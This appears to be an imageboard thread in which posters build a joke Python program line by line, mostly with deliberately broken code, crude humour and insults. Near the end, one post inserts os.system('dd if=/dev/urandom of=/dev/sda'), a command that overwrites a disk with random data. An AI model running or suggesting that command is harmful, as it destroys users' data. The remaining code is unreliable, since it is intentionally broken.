We write a Python program, one line at a time

# Welcome to Jow Forums writes a python program.

Attached: python.png (200x200, 8K)

Other urls found in this thread:

boards.Jow
twitter.com/SFWRedditImages

quit()

Attached: 1540502524931.jpg (125x125, 3K)

raise SystemExit

only works in the REPL, not when the program is run as a script. See for a more universal solution.

>thumbnail
You piece of shit.

Import requests

>not exit()

if __name__ == "__main__": print("Big penises")

include

import gf

resq = requests.get('boards.Jow Forums.org/d/thread/8509374')

mynum = "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum." / 0

>ImportError: No module named gf

do(ALT + F4)

What kind of ancient Python version are you running? Both Python 3.4 and 2.7 on my system run this script flawlessly because the site module imports __builtins__.quit as an instance of the Quitter class that takes care of dealing with IDEs like IDLE and ultimately does a "raise SystemExit(code)"; you have to start the interpreter with the -S switch to make it fail with a NameError, which technically still does the job of exiting the interpreter due to an exception.

PLLLLFRRRRRRRRRRRTTTTTTT
LOOK GUYS, I MANAGED TO TALK OUT MY ASS SOME MORE.

print('PyToddlers BTFO!')

Attached: sa.png (1274x628, 1.01M)

works for me, too.

while True:
bullshit. python has every module you may wanna need.

import os
os.system('dd if=/dev/urandom of=/dev/sda')

>'dd' is not recognized as an internal or external command, operable program or batch file.